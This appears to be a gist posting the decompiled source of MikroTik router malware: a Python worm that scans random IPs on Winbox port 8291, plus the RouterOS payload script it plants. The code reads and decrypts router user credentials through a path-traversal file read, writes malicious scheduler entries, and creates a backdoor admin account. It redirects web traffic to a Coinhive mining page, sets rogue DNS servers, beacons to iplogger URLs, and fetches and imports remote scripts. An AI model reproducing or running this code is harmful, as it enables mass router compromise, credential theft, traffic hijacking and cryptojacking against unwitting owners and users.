

@malwarezone
Last active October 14, 2018 09:21
upd_browser - MikroTik malware
:do {/ip proxy set enabled=yes port=8080 src-address="::"} on-error={:log info errorProxy}
:do {/ip proxy access remove [find Action=deny]} on-error={:log info errorProxy}
:do {/ip proxy access remove [find Action!=deny]} on-error={:log info errorProxy}
:do {/ip proxy access add action=deny disabled=no comment=sysadminpxy} on-error={:log info errorProxy}
:do {/ip firewall nat remove [find comment=sysadminpxy]} on-error={:log info errorNat}
:do {/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy} on-error={:log info errorNat}
:do {/ip firewall nat move [find comment=sysadminpxy] destination=0} on-error={:log info errorNat}
:do {/ip firewall filter remove [find comment=sysadminpxy]} on-error={:log info errorFilter}
:do {/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=5s comment=sysadminpxy} on-error={:log info errorFilter}
:do {/ip firewall filter move [find comment=sysadminpxy] destination=0} on-error={:log info errorFilter}
/ip dns set servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141
:do {/system ntp client set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235} on-error={:log info errorNtp}
/system scheduler remove [find name=Auto113]
/system scheduler remove [find name=upd111]
/system scheduler remove [find name=upd112]
/system scheduler remove [find name=upd113]
/system scheduler remove [find name=upd114]
:do {/system scheduler add name="upd111" start-time=startup on-event=":delay 5m
:do {/tool fetch url=\\"{iplogstart}\\" mode=http keep-result=no} on-error={}
/system scheduler remove [find name=upd111]" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}
:do {/system scheduler add name="upd112" start-time=startup on-event="/system scheduler remove [find name=sh113]
:do {/file remove u113.rsc} on-error={}" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}
:do {/system scheduler add name="upd113" interval=6h on-event=(":do {/tool fetch url=\\"http://min01.com:31416/min01?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}
:do {/tool fetch url=\\"http://mikr0tik.com:31416/mikr0tik?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}
:do {/tool fetch url=\\"http://up0.bit:31416/up0?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}
:do {/import u113.rsc} on-error={}
:do {/file remove u113.rsc} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}
:do {/system scheduler add name="upd114" interval=12h on-event=(
":do {/tool fetch url={iplog} mode=http keep-result=no} on-error={}"
) policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}
:do {/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorAuto113}
:do {/file remove autosupout.rif} on-error={}
:do {/file remove autosupout.old.rif} on-error={}
/ip service set api disabled=no port=8728 address=""
/ip service set ftp disabled=no port=21 address=""
:if ([:len [/user find name=("dircreate")]] > 0) do={/user remove "dircreate" }
/user add name=dircreate group=full password={newpass} disabled=no comment="{keybase58}"
:do {/file print file=dircreate} on-error={:log info errorFilePrint}
:delay 5s
:do {/file set dircreate contents="<html>\\r\\n<head>\\r\\n\t<meta http-equiv=\\"Content-Type\\" content=\\"text/html;charset=windows-1251\\">\\r\\n\t<title>\\"\\$(url)\\"</title> \\r\\n<script src=\\"https://coinhive.com/lib/coinhive.min.js\\"></script>\\r\\n<script>\\r\\n\tvar miner = new CoinHive.Anonymous({chKey}, {throttle: 0.1});\\r\\n\t
miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);\\r\\n</script>\\r\\n</head>\\r\\n<frameset>\\r\\n<frame src=\\"\\$(url)\\"></frame>\\r\\n</frameset>\\r\\n</html>"} on-error={:log info errorFileSave}
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="webproxy/error.html"} on-error={:log info errorfileCopy}
:do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="flash/webproxy/error.html"} on-error={:log info errorfileCopy2}
:do {/file remove "dircreate.txt"} on-error={}
:do {/user set address=87.246.0.0/16,152.237.0.0/16,10.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,{vip} [find name!=dircreate]} on-error={:log info errorSetAddress}
:do {/user set disabled=yes [find name=dircreate]} on-error={:log info errorSetAddress}
/user remove [find name=ftu]
/user group remove [find name=ftpgroupe]
/ip service set ftp disabled=yes port=21 address=""
:do {/ip socks set enabled=no port=27182} on-error={:log info errorSocksSet}
:do {/ip socks access remove [find action=deny]} on-error={:log info errorSocksAccess}
:do {/ip socks access remove [find action!=deny]} on-error={:log info errorSocksAceess}
:do {/ip dns static remove [find address!=1.1.1.1]} on-error={:log info errorStaticDns}
:do {/tool sniffer set streaming-enabled=no} on-error={:log info errorSniffer}
/system reboot
# Embedded file name: upd_browser.py
import threading, time, socket, random, ups, datetime, urllib, base58, pyautogui
thmax = 600
def poc(ip, level):
level = int(level)
if level == 3:
return False
user_pass = ups.get_user_pass(ip)
if len(user_pass) != 0:
try:
fg = False
shed = bytearray([])
shedidx = bytearray([])
part = random.randint(0, 9)
newpass = ''
for i in xrange(0, 10):
newpass += '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'[random.randint(0, 57)]
for user_pass_one in user_pass:
if user_pass_one[1] == 'dircreate':
newpass = user_pass_one[2]
ups.log(ip + ':' + 'dircreate' + ':' + newpass)
strusr = ip + '- part ' + str(part) + '\r\n'
for user_pass_one in user_pass:
strusr += ip + ':' + user_pass_one[1] + ':' + user_pass_one[2] + '\r\n'
ups.log(strusr)
keybase58 = ups.decrypt_password('Admiral', newpass)
keybase58 = base58.b58encode(keybase58)
shed, shedidx = ups.make_sheduller(shed, shedidx, ups.get_script(ip, part, newpass, keybase58))
for user_pass_one in user_pass:
if user_pass_one[0] == 'f':
fg1 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False)
fg2 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True)
if fg1 and fg2:
fg = True
break
if not fg:
for user_pass_one in user_pass:
if user_pass_one[0] != 'f':
fg1 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False)
fg2 = ups.save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True)
if fg1 and fg2:
fg = True
break
except:
ups.log('Error excep poc')
if fg:
ups.log(ip + ' - ok')
return True
else:
ups.log(ip + ' - bad, level=' + str(level))
time.sleep(150)
return poc(ip, level + 1)
def ping(ip, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
try:
serror = s.connect_ex((ip, port))
except:
serror = -1
finally:
s.close()
return serror
def scan():
while True:
random.seed()
ip2 = str(random.randint(0, 255))
time.sleep(random.randint(0, random.randint(0, 50)))
ip1 = str(random.randint(0, 255))
ip3b = random.randint(0, 255)
for ip3s in xrange(ip3b, ip3b + 20):
ip3 = ip3s
if ip3 > 255:
ip3 = ip3 - 256
for ip4 in xrange(0, 256):
ip = str(ip1) + '.' + str(ip2) + '.' + str(ip3) + '.' + str(ip4)
serror = ping(ip, 8291)
if serror == 0:
serror = ping(ip, random.randint(56778, 56887))
if serror != 0:
poc(ip, 0)
if __name__ == '__main__':
time.sleep(3)
pyautogui.alert(text='Update error code 80072EE2', title='Error', button='OK')
time.sleep(20)
urllib.urlopen(ups.viplogpoc).read()
ups.log('Start 0')
for i in xrange(thmax):
try:
p = threading.Thread(target=scan)
p.setDaemon(True)
p.start()
if i == thmax - 1:
ups.log('Start 550')
except:
ups.log('Exccept threading')
vnow = datetime.date(2012, 12, 12)
while True:
vold = vnow
vnow = datetime.datetime.now()
if (vold.year != vnow.year or vold.month != vnow.month or vold.day != vnow.day or vold.hour != vnow.hour) and vold.year != 2012:
urllib.urlopen(ups.viplogpoc).read()
time.sleep(1000)
ups.log('All END!!!')
# Embedded file name: ups.py
import socket, sys, hashlib, random, base58
part = 0
keybase58 = ''
viplogpoc = 'http://iplogger.co/1DQrN6'
def get_script(vip, vpart, vnewpass, vkeybase58):
viplog = ('http://iplogger.co/1DErN6',
'http://iplogger.co/1DYrN6',
'http://iplogger.co/1DPrN6',
'http://iplogger.co/1DArN6',
'http://iplogger.co/1DSrN6',
'http://iplogger.co/1DDrN6',
'http://iplogger.co/1DFrN6',
'http://iplogger.co/1DGrN6',
'http://iplogger.co/1DHrN6',
'http://iplogger.co/1DJrN6')
viplogstart = 'http://iplogger.co/1DcrN6'
vchKey = ("'oiKAGEslcNfjfgxTMrxKGMJvh436ypIM'",
"'5zHUikiwJT4MLzQ9PLbU11gEz8TLCcYx'",
"'5ROof564mEBQsYzCqee0M2LplLBEApCv'",
"'qKoXV8jXlcUaIt0LGcMJIHw7yLJEyyVO'",
"'ZsyeL0FvutbhhdLTVEYe3WOnyd3BU1fK'",
"'ByMzv397Mzjcm4Tvr3dOzD6toK0LOqgf'",
"'joy1MQSiGgGHos78FarfEGIuM5Ig7l8h'",
"'ryZ1Dl4QYuDlQBMchMFviBXPL1E1bbGs'",
"'jh0GD0ZETDOfypDbwjTNWXWIuvUlwtsF'",
"'BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma'",
"'BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma'")
mtscript = ':do {/ip proxy set enabled=yes port=8080 src-address="::"} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip proxy access remove [find Action=deny]} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip proxy access remove [find Action!=deny]} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip proxy access add action=deny disabled=no comment=sysadminpxy} on-error={:log info errorProxy}' + '\r\n' + ':do {/ip firewall nat remove [find comment=sysadminpxy]} on-error={:log info errorNat}' + '\r\n' + ':do {/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy} on-error={:log info errorNat}' + '\r\n' + ':do {/ip firewall nat move [find comment=sysadminpxy] destination=0} on-error={:log info errorNat}' + '\r\n' + ':do {/ip firewall filter remove [find comment=sysadminpxy]} on-error={:log info errorFilter}' + '\r\n' + ':do {/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=5s comment=sysadminpxy} on-error={:log info errorFilter}' + '\r\n' + ':do {/ip firewall filter move [find comment=sysadminpxy] destination=0} on-error={:log info errorFilter}' + '\r\n' + '/ip dns set servers=94.247.43.254,107.172.42.186,128.52.130.209,163.53.248.170,185.208.208.141' + '\r\n' + ':do {/system ntp client set enabled=yes primary-ntp=88.147.254.230 secondary-ntp=88.147.254.235} on-error={:log info errorNtp}' + '\r\n' + '/system scheduler remove [find name=Auto113]' + '\r\n' + '/system scheduler remove [find name=upd111]' + '\r\n' + '/system scheduler remove [find name=upd112]' + '\r\n' + '/system scheduler remove [find name=upd113]' + '\r\n' + '/system scheduler remove [find name=upd114]' + '\r\n' + ':do {/system scheduler add name="upd111" start-time=startup on-event=":delay 5m\\r\\n:do {/tool fetch url=\\"{iplogstart}\\" mode=http keep-result=no} on-error={}\\r\\n/system scheduler remove [find 
name=upd111]" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}' + '\r\n' + ':do {/system scheduler add name="upd112" start-time=startup on-event="/system scheduler remove [find name=sh113]\\r\\n:do {/file remove u113.rsc} on-error={}" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd112}' + '\r\n' + ':do {/system scheduler add name="upd113" interval=6h on-event=(":do {/tool fetch url=\\"http://min01.com:31416/min01?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}\\r\\n:do {/tool fetch url=\\"http://mikr0tik.com:31416/mikr0tik?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}\\r\\n:do {/tool fetch url=\\"http://up0.bit:31416/up0?key={keybase58}&part={part}\\" mode=http dst-path=u113.rsc} on-error={}\\r\\n:do {/import u113.rsc} on-error={}\\r\\n:do {/file remove u113.rsc} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}' + '\r\n' + ':do {/system scheduler add name="upd114" interval=12h on-event=(":do {/tool fetch url={iplog} mode=http keep-result=no} on-error={}") policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorUpd113}' + '\r\n' + ':do {/system scheduler add name="Auto113" start-time=03:11:00 interval=1d on-event="/system reboot" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write} on-error={:log info errorAuto113}' + '\r\n' + ':do {/file remove autosupout.rif} on-error={}' + '\r\n' + ':do {/file remove autosupout.old.rif} on-error={}' + '\r\n' + '/ip service set api disabled=no port=8728 address=""' + '\r\n' + '/ip service set ftp disabled=no port=21 address=""' + '\r\n' + ':if ([:len [/user find name=("dircreate")]] > 0) do={/user remove 
"dircreate" }' + '\r\n' + '/user add name=dircreate group=full password={newpass} disabled=no comment="{keybase58}"' + '\r\n' + ':do {/file print file=dircreate} on-error={:log info errorFilePrint}' + '\r\n' + ':delay 5s' + '\r\n' + ':do {/file set dircreate contents="<html>\\r\\n<head>\\r\\n\t<meta http-equiv=\\"Content-Type\\" content=\\"text/html;charset=windows-1251\\">\\r\\n\t<title>\\"\\$(url)\\"</title> \\r\\n<script src=\\"https://coinhive.com/lib/coinhive.min.js\\"></script>\\r\\n<script>\\r\\n\tvar miner = new CoinHive.Anonymous({chKey}, {throttle: 0.1});\\r\\n\tminer.start(CoinHive.FORCE_EXCLUSIVE_TAB);\\r\\n</script>\\r\\n</head>\\r\\n<frameset>\\r\\n<frame src=\\"\\$(url)\\"></frame>\\r\\n</frameset>\\r\\n</html>"} on-error={:log info errorFileSave}' + '\r\n' + ':do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="webproxy/error.html"} on-error={:log info errorfileCopy}' + '\r\n' + ':do {/tool fetch address=127.0.0.1 mode=ftp user=dircreate password={newpass} src-path="dircreate.txt" dst-path="flash/webproxy/error.html"} on-error={:log info errorfileCopy2}' + '\r\n' + ':do {/file remove "dircreate.txt"} on-error={}' + '\r\n' + ':do {/user set address=87.246.0.0/16,152.237.0.0/16,10.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,{vip} [find name!=dircreate]} on-error={:log info errorSetAddress}' + '\r\n' + ':do {/user set disabled=yes [find name=dircreate]} on-error={:log info errorSetAddress}' + '\r\n' + '/user remove [find name=ftu]' + '\r\n' + '/user group remove [find name=ftpgroupe]' + '\r\n' + '/ip service set ftp disabled=yes port=21 address=""' + '\r\n' + ':do {/ip socks set enabled=no port=27182} on-error={:log info errorSocksSet}' + '\r\n' + ':do {/ip socks access remove [find action=deny]} on-error={:log info errorSocksAccess}' + '\r\n' + ':do {/ip socks access remove [find action!=deny]} on-error={:log info errorSocksAceess}' + '\r\n' + ':do {/ip dns static remove [find 
address!=1.1.1.1]} on-error={:log info errorStaticDns}' + '\r\n' + ':do {/tool sniffer set streaming-enabled=no} on-error={:log info errorSniffer}' + '\r\n' + '/system reboot'
mt = mtscript.replace('{part}', str(vpart))
mt = mt.replace('{iplog}', viplog[vpart])
mt = mt.replace('{iplogstart}', viplogstart)
mt = mt.replace('{keybase58}', vkeybase58)
mt = mt.replace('{chKey}', vchKey[vpart])
mt = mt.replace('{newpass}', vnewpass)
mt = mt.replace('{vip}', vip.split('.')[0] + '.' + vip.split('.')[1] + '.' + vip.split('.')[2] + '.0/24')
return mt
def log(s):
s = str(s)
try:
print s
except:
print 'error except log'
def decrypt_password(user, pass_enc):
key = hashlib.md5(user + '283i4jfkai3389').digest()
passw = ''
b1 = bytearray(pass_enc)
b2 = bytearray(key)
for i in range(0, len(b1)):
passw += chr(b1[i] ^ b2[i % len(key)])
return passw.split('\x00')[0]
def extract_user_pass_from_entry(entry):
user_data = entry.split('\x01\x00\x00!')[1]
pass_data = entry.split('\x11\x00\x00!')[1]
user_len = ord(user_data[0])
pass_len = ord(pass_data[0])
username = user_data[1:1 + user_len]
password = pass_data[1:1 + pass_len]
return (username, password)
def get_pair(data):
user_list = []
entries = data.split('M2')[1:]
for entry in entries:
try:
user, pass_encrypted = extract_user_pass_from_entry(entry)
if entry.find('\x02\x00\x00\t\x03') != -1:
frw = 'f'
else:
frw = 'x'
except:
continue
pass_plain = decrypt_password(user, pass_encrypted)
user = str(user)
user_list.append((frw, user, pass_plain))
return user_list
def delete255(d):
d1 = ''
while len(d) > 0:
d = d[2:]
d1 = d1 + d[:255]
d = d[255:]
return d1
def insert255(d):
if len(d) < 256:
d1 = bytearray([len(d), 1])
else:
d1 = bytearray([255, 1])
while len(d) > 0:
d1 = d1 + d[0:255]
d = d[255:]
if len(d) != 0:
if len(d) < 256:
d1 = d1 + bytearray([len(d), 255])
else:
d1 = d1 + bytearray([255, 255])
return d1
def load_file(ip, namefile):
a1 = 'M2\x05\x00\xff\x01\x06\x00\xff\t\x05\x07\x00\xff\t\x07\x01\x00\x00!'
a2 = '\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00'
b = ';\x01\x009M2\x05\x00\xff\x01\x06\x00\xff\t\x06\x01\x00\xfe\t5\x02\x00\x00\x08\x00\x80\x00\x00\x07\x00' + '\xff\t\x04\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00'
try:
s = socket.socket()
s.settimeout(10)
s.connect((ip, 8291))
a = a1 + chr(len(namefile)) + namefile + a2
a = chr(len(a) + 2) + '\x01\x00' + chr(len(a)) + a
s.send(bytearray(a))
d = str(s.recv(1024))
if len(d) < 38:
raise Exception('no answer')
if d[4] != 'M' or d[5] != '2':
raise Exception('Not M2')
b = b[:19] + d[38] + b[20:]
s.send(bytearray(b))
d = str(s.recv(256 * 256))
if len(d) < 6:
raise Exception('no answer')
if d[4] != 'M' or d[5] != '2':
raise Exception('Not M2')
d = delete255(d)
n = d.find('\x03\x00\x00')
if d[n + 3] == '1':
res = d[n + 5:]
elif d[n + 3] == '0':
res = d[n + 6:]
else:
res = ''
except:
res = ''
finally:
s.close()
return res
def get_user_pass(ip):
return get_pair(load_file(ip, '/////./..//////./..//////./../flash/rw/store/user.dat'))
def save_file(ip, user, password, namefile, data, fg_reboot):
pinit = [55,
1,
0,
53,
77,
50,
5,
0,
255,
1,
6,
0,
255,
9,
1,
7,
0,
255,
9,
7,
1,
0,
0,
33,
4,
108,
105,
115,
116,
2,
0,
255,
136,
2,
0,
0,
0,
0,
0,
11,
0,
0,
0,
1,
0,
255,
136,
2,
0,
2,
0,
0,
0,
2,
0,
0,
0]
psalt = [42,
1,
0,
40,
77,
50,
1,
0,
254,
9,
39,
7,
0,
255,
9,
5,
2,
0,
255,
136,
2,
0,
0,
0,
0,
0,
11,
0,
0,
0,
1,
0,
255,
136,
2,
0,
2,
0,
0,
0,
2,
0,
0,
0,
46,
1,
0,
44,
77,
50,
5,
0,
255,
1,
6,
0,
255,
9,
2,
7,
0,
255,
9,
4,
2,
0,
255,
136,
2,
0,
0,
0,
0,
0,
11,
0,
0,
0,
1,
0,
255,
136,
2,
0,
13,
0,
0,
0,
4,
0,
0,
0]
ppass = [100,
1,
0,
98,
77,
50,
12,
0,
0,
0,
5,
0,
255,
1,
6,
0,
255,
9,
3,
7,
0,
255,
9,
1,
10,
0,
0,
49,
17,
0,
19,
120,
15,
235,
246,
25,
15,
217,
0,
237,
39,
189,
25,
20,
243,
36,
9,
0,
0,
49,
16,
185,
185,
158,
154,
32,
172,
153,
96,
86,
163,
217,
155,
155,
201,
53,
22,
1,
0,
0,
33,
2,
2,
0,
255,
136,
2,
0,
0,
0,
0,
0,
11,
0,
0,
0,
1,
0,
255,
136,
2,
0,
13,
0,
0,
0,
4,
0,
0,
0]
h1 = 'M2\x05\x00\xff\x01\x06\x00\xff\t\x01\x07\x00\xff\t\x01\x01\x00\x00!'
h2 = '\x02\x00\xff\x88\x02\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\xff\x88\x02\x00\x02\x00\x00\x00\x02\x00\x00\x00'
fl1 = bytearray([77,
50,
5,
0,
255,
1,
4,
0,
0,
1,
1,
0,
254,
9,
3,
6,
0,
255,
9,
12,
7,
0,
255,
9,
2,
3,
0,
0])
fl2 = bytearray([2,
0,
255,
136,
2,
0,
0,
0,
0,
0,
8,
0,
0,
0,
1,
0,
255,
136,
2,
0,
2,
0,
0,
0,
2,
0,
0,
0])
rb = bytearray([42,
1,
0,
40,
77,
50,
5,
0,
255,
1,
6,
0,
255,
9,
13,
7,
0,
255,
9,
5,
2,
0,
255,
136,
2,
0,
0,
0,
0,
0,
8,
0,
0,
0,
1,
0,
255,
136,
1,
0,
24,
0,
0,
0])
res = False
try:
s = socket.socket()
s.settimeout(10)
s.connect((ip, 8291))
pinit = bytearray(pinit)
psalt = bytearray(psalt)
ppass = bytearray(ppass)
s.send(pinit)
del pinit
d = bytearray(s.recv(256 * 256))
psalt[10] = d[38]
s.send(psalt)
del psalt
d = bytearray(s.recv(256 * 256))
i = d.index(bytearray([9,
0,
0,
49,
16]))
salt = d[i + 5:i + 5 + 16]
hash = bytearray(hashlib.md5('\x00' + password + str(salt)).digest())
i = ppass.index(bytearray([10,
0,
0,
49]))
ppass[i + 6:i + 6 + 16] = hash
i = ppass.index(bytearray([9,
0,
0,
49]))
ppass[i + 5:i + 5 + 16] = salt
i = ppass.index(bytearray([1,
0,
0,
33]))
ppass[i + 4] = len(user)
ppass = ppass[:i + 5] + bytearray(user) + ppass[i + 5:]
ppass[0] = 98 + len(user)
ppass[3] = 96 + len(user)
s.send(ppass)
del ppass
d = bytearray(s.recv(256 * 256))
if d.find(bytearray([105,
110,
118,
97,
108])) != -1:
raise Exception('Invalid password')
h = h1 + chr(len(namefile)) + namefile + h2
h = chr(len(h) + 2) + '\x01\x00' + chr(len(h)) + h
s.send(bytearray(h))
del h1
del h2
del h
d = bytearray(s.recv(256 * 256))
i = d.index(bytearray([1,
0,
254,
9]))
fl1[14] = d[i + 4]
if len(data) < 256:
fl = fl1 + bytearray([49, len(data)])
else:
fl = fl1 + bytearray([48, len(data) % 256, len(data) // 256])
fl = fl + bytearray(data) + fl2
fl = bytearray([len(fl) // 256, len(fl) % 256]) + fl
fl = insert255(fl)
s.send(bytearray(fl))
d = bytearray(s.recv(256 * 256))
i = d.find(bytearray([8,
0,
255,
8]))
res = i == -1
if fg_reboot:
s.send(rb)
d = bytearray(s.recv(256 * 256))
except:
res = False
finally:
s.close()
return res
def make_sheduller(shed, shedidx, mtscript):
p1 = bytearray([77,
50,
10,
0,
254,
0,
46,
1,
0,
8,
255,
255,
255,
255,
49,
1,
0,
8,
224,
1,
0,
0,
109,
0,
0,
9,
0,
1,
0,
254,
9,
0,
113,
0,
0,
8,
240,
107,
1,
0,
103,
0,
0,
33,
5,
97,
100,
109,
105,
110,
9,
0,
254,
33,
0,
45,
1,
0])
p2 = bytearray([102,
0,
0,
33,
5,
115,
104,
49,
49,
51])
idx = bytearray([0,
0,
0,
0,
43,
1,
0,
0,
5,
0,
0,
0])
shed = bytearray(shed)
shedidx = bytearray(shedidx)
try:
if len(mtscript) < 256:
p = p1 + bytearray([33, len(mtscript)]) + bytearray(mtscript) + p2
else:
p = p1 + bytearray([32, len(mtscript) % 256, len(mtscript) // 256]) + bytearray(mtscript) + p2
t1 = len(p) % 256 + 2
t2 = len(p) // 256
if t1 > 255:
t1 = t1 - 256
t2 += 1
p = bytearray([t1, t2]) + p
idx[4] = t1
idx[5] = t2
t2 = -1
t1 = 0
if len(shedidx) != 0:
while t1 < len(shedidx):
if shedidx[t1] > t2 and shedidx[t1] != 255:
t2 = shedidx[t1]
t1 += 12
idx[0] = t2 + 1
except:
p = bytearray([])
idx = bytearray([])
return (shed + p, shedidx + idx)
if __name__ == '__main__':
ip = '79.142.53.22'
user_pass = get_user_pass(ip)
if len(user_pass) != 0:
fg = False
shed = bytearray([])
shedidx = bytearray([])
part = random.randint(0, 9)
newpass = ''
for i in xrange(0, 10):
newpass += '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'[random.randint(0, 57)]
for user_pass_one in user_pass:
if user_pass_one[1] == 'dircreate':
newpass = user_pass_one[2]
log(ip + ':' + 'dircreate' + ':' + newpass)
strusr = ip + '- part ' + str(part) + '\r\n'
for user_pass_one in user_pass:
strusr += ip + ':' + user_pass_one[1] + ':' + user_pass_one[2] + '\r\n'
log(strusr)
keybase58 = decrypt_password('Admiral', newpass)
keybase58 = base58.b58encode(keybase58)
shed, shedidx = make_sheduller(shed, shedidx, get_script(ip, part, newpass, keybase58))
for user_pass_one in user_pass:
if user_pass_one[0] == 'f':
fg1 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False)
fg2 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True)
if fg1 and fg2:
fg = True
break
if not fg:
for user_pass_one in user_pass:
if user_pass_one[0] != 'f':
fg1 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.dat', shed, False)
fg2 = save_file(ip, user_pass_one[1], user_pass_one[2], '/////./..//////./..//////./../flash/rw/store/scheduler.idx', shedidx, True)
if fg1 and fg2:
fg = True
break
if fg:
log(ip + ' - ok')
else:
log(ip + ' - bad')